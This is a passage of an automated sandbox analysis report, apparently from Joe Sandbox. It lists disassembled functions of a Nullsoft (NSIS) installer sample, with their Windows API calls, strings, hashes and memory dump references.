                                                      • Opcode Fuzzy Hash: 3bfd9f40d867dfb13d75fcd1b7ef3c21c8eb5f8be3eae84d4eb3b7d6c7e95577
                                                      • Instruction Fuzzy Hash: BF41C171800914EACF217B668C49BBF7678EB81328F24817BF811761D1D77C4E829E6E
                                                      Function 0040659D Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                      • Instruction ID: 2d3234ddcc30eb1b928d1b3f6e05ca322d860fc2e9c12c5c13e3e91ce8371178
                                                      • Opcode Fuzzy Hash: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                      • Instruction Fuzzy Hash: 74F17571D04229CBCF28CFA8C8946ADBBB1FF44305F25856ED456BB281D3785A96CF44
                                                      Function 0040628B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(00436800,00425738,00424EF0,00405AE4,00424EF0,00424EF0,00000000,00424EF0,00424EF0,00436800,?,771B2EE0,004057F0,?,00436800,771B2EE0), ref: 00406296
                                                      • FindClose.KERNEL32(00000000), ref: 004062A2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Find$CloseFileFirst
                                                      • String ID: 8WB
                                                      • API String ID: 2295610775-3088156181
                                                      • Opcode ID: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                      • Instruction ID: bfad84801e56aa45620b307e7a8f789e26230cc956ed9d1a225fdef78671a1f1
                                                      • Opcode Fuzzy Hash: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                      • Instruction Fuzzy Hash: A7D01231A59020ABC6003B38AD0C84B7A989B553317224AB6F426F63E0C37C8C66969D
                                                      Function 00405331 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 282windowclipboardmemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDlgItem.USER32(?,00000403), ref: 00405390
                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040539F
                                                      • GetClientRect.USER32(?,?), ref: 004053DC
                                                      • GetSystemMetrics.USER32(00000015), ref: 004053E4
                                                      • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00405405
                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405416
                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405429
                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405437
                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040544A
                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040546C
                                                      • ShowWindow.USER32(?,00000008), ref: 00405480
                                                      • GetDlgItem.USER32(?,000003EC), ref: 004054A1
                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004054B1
                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004054CA
                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004054D6
                                                      • GetDlgItem.USER32(?,000003F8), ref: 004053AE
                                                        • Part of subcall function 004041CF: SendMessageW.USER32(00000028,?,00000001,00403FFB), ref: 004041DD
                                                      • GetDlgItem.USER32(?,000003EC), ref: 004054F3
                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000052C5,00000000), ref: 00405501
                                                      • CloseHandle.KERNEL32(00000000), ref: 00405508
                                                      • ShowWindow.USER32(00000000), ref: 0040552C
                                                      • ShowWindow.USER32(?,00000008), ref: 00405531
                                                      • ShowWindow.USER32(00000008), ref: 0040557B
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055AF
                                                      • CreatePopupMenu.USER32 ref: 004055C0
                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004055D4
                                                      • GetWindowRect.USER32(?,?), ref: 004055F4
                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040560D
                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                      • OpenClipboard.USER32(00000000), ref: 00405655
                                                      • EmptyClipboard.USER32 ref: 0040565B
                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405667
                                                      • GlobalLock.KERNEL32(00000000), ref: 00405671
                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405685
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004056A5
                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004056B0
                                                      • CloseClipboard.USER32 ref: 004056B6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                      • String ID: {$&B
                                                      • API String ID: 590372296-2518801558
                                                      • Opcode ID: 7570b3111e19f9b1f2c2f087663f0f5ff2e06d661aa676c5aff00108803347b1
                                                      • Instruction ID: 6f8bb207ab4459f732b66fbe2fdab1c380fd8c459621fe3193bce92f33b6cf64
                                                      • Opcode Fuzzy Hash: 7570b3111e19f9b1f2c2f087663f0f5ff2e06d661aa676c5aff00108803347b1
                                                      • Instruction Fuzzy Hash: ECB14A70900208FFDB119F60DD89AAE7B79FB04354F40817AFA05BA1A0C7759E52DF69
                                                      Function 00403CC2 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CFE
                                                      • ShowWindow.USER32(?), ref: 00403D1B
                                                      • DestroyWindow.USER32 ref: 00403D2F
                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D4B
                                                      • GetDlgItem.USER32(?,?), ref: 00403D6C
                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D80
                                                      • IsWindowEnabled.USER32(00000000), ref: 00403D87
                                                      • GetDlgItem.USER32(?,00000001), ref: 00403E35
                                                      • GetDlgItem.USER32(?,00000002), ref: 00403E3F
                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00403E59
                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EAA
                                                      • GetDlgItem.USER32(?,00000003), ref: 00403F50
                                                      • ShowWindow.USER32(00000000,?), ref: 00403F71
                                                      • EnableWindow.USER32(?,?), ref: 00403F83
                                                      • EnableWindow.USER32(?,?), ref: 00403F9E
                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FB4
                                                      • EnableMenuItem.USER32(00000000), ref: 00403FBB
                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403FD3
                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FE6
                                                      • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 0040400F
                                                      • SetWindowTextW.USER32(?,004226E8), ref: 00404023
                                                      • ShowWindow.USER32(?,0000000A), ref: 00404157
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                      • String ID: &B
                                                      • API String ID: 184305955-3208460036
                                                      • Opcode ID: 7cbc7830e6f4af9eeab0957ba226e6b71e67b9927e797dbb4650133cf52de542
                                                      • Instruction ID: 615a13079a357bc63dc92eaebf5b97e46402dd0953b19927b77141fc7a078d9b
                                                      • Opcode Fuzzy Hash: 7cbc7830e6f4af9eeab0957ba226e6b71e67b9927e797dbb4650133cf52de542
                                                      • Instruction Fuzzy Hash: B6C1A371A04201BBDB216F61ED49E2B3AA8FB95705F40093EF601B51F1C7799892DB2E
                                                      Function 0040391F Relevance: 42.2, APIs: 15, Strings: 9, Instructions: 216stringregistrylibraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                        • Part of subcall function 004062B2: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                        • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                      • lstrcatW.KERNEL32(00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,00436800,771B3420,00000000,00434000), ref: 004039A0
                                                      • lstrlenW.KERNEL32(004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,00436800), ref: 00403A20
                                                      • lstrcmpiW.KERNEL32(00427198,.exe,004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403A33
                                                      • GetFileAttributesW.KERNEL32(004271A0), ref: 00403A3E
                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 00403A87
                                                        • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                      • RegisterClassW.USER32(004281A0), ref: 00403AC4
                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ADC
                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B11
                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403B47
                                                      • LoadLibraryW.KERNEL32(RichEd20), ref: 00403B58
                                                      • LoadLibraryW.KERNEL32(RichEd32), ref: 00403B63
                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403B73
                                                      • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403B80
                                                      • RegisterClassW.USER32(004281A0), ref: 00403B89
                                                      • DialogBoxParamW.USER32(?,00000000,00403CC2,00000000), ref: 00403BA8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                      • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                      • API String ID: 914957316-1918744475
                                                      • Opcode ID: da30a9c0db2d4db67001de93ddcc73e1ef45d51233dd8672779a7638217d6adb
                                                      • Instruction ID: 309fb0296e4a6d1bba18aa3b2e86eaa258190dfd088e540a173f113b23667d40
                                                      • Opcode Fuzzy Hash: da30a9c0db2d4db67001de93ddcc73e1ef45d51233dd8672779a7638217d6adb
                                                      • Instruction Fuzzy Hash: BE61B570644200BED720AF669C46F2B3A7CEB84749F40457FF945B62E2DB796902CA3D
                                                      Function 00404337 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 207windowstringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004043D5
                                                      • GetDlgItem.USER32(?,000003E8), ref: 004043E9
                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404406
                                                      • GetSysColor.USER32(?), ref: 00404417
                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404425
                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404433
                                                      • lstrlenW.KERNEL32(?), ref: 00404438
                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404445
                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040445A
                                                      • GetDlgItem.USER32(?,0000040A), ref: 004044B3
                                                      • SendMessageW.USER32(00000000), ref: 004044BA
                                                      • GetDlgItem.USER32(?,000003E8), ref: 004044E5
                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404528
                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00404536
                                                      • SetCursor.USER32(00000000), ref: 00404539
                                                      • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,00000001), ref: 0040454E
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0040455A
                                                      • SetCursor.USER32(00000000), ref: 0040455D
                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040458C
                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040459E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                      • String ID: N$open
                                                      • API String ID: 3615053054-904208323
                                                      • Opcode ID: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                      • Instruction ID: 8b9c65ccee0929ae2cd37a550bbe3266d1c56d3aba5277cbe5cc7d17fb3eae84
                                                      • Opcode Fuzzy Hash: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                      • Instruction Fuzzy Hash: 19718FB1A00209FFDB109F60DD85A6A7BA9FB94354F00853AFB01B62D1C778AD51CF99
                                                      Function 00405C66 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136stringmemoryfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C76
                                                      • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C9A
                                                      • GetShortPathNameW.KERNEL32(00000000,00425D88,00000400), ref: 00405CA3
                                                        • Part of subcall function 00405B19: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                        • Part of subcall function 00405B19: lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                      • GetShortPathNameW.KERNEL32(?,00426588,00000400), ref: 00405CC0
                                                      • wsprintfA.USER32 ref: 00405CDE
                                                      • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,00000004,00426588,?,?,?,?,?), ref: 00405D19
                                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405D28
                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D60
                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409560,00000000,[Rename],00000000,00000000,00000000), ref: 00405DB6
                                                      • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405DC8
                                                      • GlobalFree.KERNEL32(00000000), ref: 00405DCF
                                                      • CloseHandle.KERNEL32(00000000), ref: 00405DD6
                                                        • Part of subcall function 00405BB4: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BB8
                                                        • Part of subcall function 00405BB4: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                      • String ID: %ls=%ls$NUL$[Rename]
                                                      • API String ID: 1265525490-899692902
                                                      • Opcode ID: 7d53d5cdfc02749ad00d931577bac562460a5dc9187a855172881db6ba44cc92
                                                      • Instruction ID: 10a6a65bcc8db41326b0965a868e5b78be2cc6b43571d182478210b5aa6aebd6
                                                      • Opcode Fuzzy Hash: 7d53d5cdfc02749ad00d931577bac562460a5dc9187a855172881db6ba44cc92
                                                      • Instruction Fuzzy Hash: E941FE71604A18BFD2206B61AC4CF6B3A6CEF45714F24443BB901B62D2EA78AD018A7D
                                                      Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                      • DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                      • String ID: F
                                                      • API String ID: 941294808-1304234792
                                                      • Opcode ID: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                      • Instruction ID: fcf32cd20748a1213536d9d4e972d5f65e682a1af5e7fde79162f5b09e182029
                                                      • Opcode Fuzzy Hash: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                      • Instruction Fuzzy Hash: D2418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF561AA1A0C738EA51DFA5
                                                      Function 00404635 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 265stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404684
                                                      • SetWindowTextW.USER32(00000000,?), ref: 004046AE
                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0040475F
                                                      • CoTaskMemFree.OLE32(00000000), ref: 0040476A
                                                      • lstrcmpiW.KERNEL32(004271A0,004226E8,00000000,?,?), ref: 0040479C
                                                      • lstrcatW.KERNEL32(?,004271A0), ref: 004047A8
                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004047BA
                                                        • Part of subcall function 00405708: GetDlgItemTextW.USER32(?,?,00000400,004047F1), ref: 0040571B
                                                        • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,771B3420,00403542), ref: 0040623F
                                                        • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                        • Part of subcall function 004061DC: CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,771B3420,00403542), ref: 00406253
                                                        • Part of subcall function 004061DC: CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,771B3420,00403542), ref: 00406266
                                                      • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000000,004206B8,?,?,000003FB,?), ref: 0040487B
                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404896
                                                      • SetDlgItemTextW.USER32(00000000,00000400,004206A8), ref: 0040490F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                      • String ID: A$&B
                                                      • API String ID: 2246997448-2586977930
                                                      • Opcode ID: 721fa909628c388d9eed4d059dc136074f5db6b4ff511665bfd1b1201094e888
                                                      • Instruction ID: 6e37369fe6ef7f71d764005b1086c215e28ed7130f32df1ae996be3c53d44702
                                                      • Opcode Fuzzy Hash: 721fa909628c388d9eed4d059dc136074f5db6b4ff511665bfd1b1201094e888
                                                      • Instruction Fuzzy Hash: A79170F1900219EBDB10AFA1DC85AAF77B8EF85714F10443BF601B62D1D77C9A418B69
                                                      Function 00402DBC Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 203memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00402DD0
                                                      • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEC
                                                        • Part of subcall function 00405BB4: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BB8
                                                        • Part of subcall function 00405BB4: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                      • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 00402E35
                                                      • GlobalAlloc.KERNEL32(00000040,00409230), ref: 00402F7C
                                                      Strings
                                                      • soft, xrefs: 00402EAC
                                                      • Null, xrefs: 00402EB5
                                                      • Error launching installer, xrefs: 00402E0C
                                                      • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC5
                                                      • Inst, xrefs: 00402EA3
                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403013
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2484087963.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.2484031765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484393312.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484453178.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.2484558832.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                      • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                      • API String ID: 2803837635-787788815
                                                      • Opcode ID: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                      • Instruction ID: b2cc58b1aa553f56ba66d3b0850f03698e33e3340d89f7fe3e9d1fe3a0eb5287
                                                      • Opcode Fuzzy Hash: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                      • Instruction Fuzzy Hash: 43610371941205ABDB209FA4DD85B9E3BB8EB04354F20447BF605B72D2C7BC9E418BAD
                                                      Function 00405F6A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 207stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetVersion.KERNEL32(00000000,004216C8,?,00405229,004216C8,00000000,00000000,00000000), ref: 0040602D
                                                      • GetSystemDirectoryW.KERNEL32(004271A0,00000400), ref: 004060AB
                                                      • GetWindowsDirectoryW.KERNEL32(004271A0,00000400), ref: 004060BE
                                                      • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004060FA
                                                      • SHGetPathFromIDListW.SHELL32(?,004271A0), ref: 00406108
                                                      • CoTaskMemFree.OLE32(?), ref: 00406113
                                                      • lstrcatW.KERNEL32(004271A0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406137
